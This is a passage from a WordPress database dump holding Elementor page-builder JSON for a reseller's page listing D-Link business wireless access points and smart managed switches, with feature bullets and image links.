Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a9f02d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7578,3411,'_elementor_version','2.5.14'),(7579,3411,'_elementor_edit_mode','builder'),(7582,3412,'_wp_page_template','template-fullwidth.php'),(7583,3412,'_elementor_template_type','post'),(7584,3412,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central 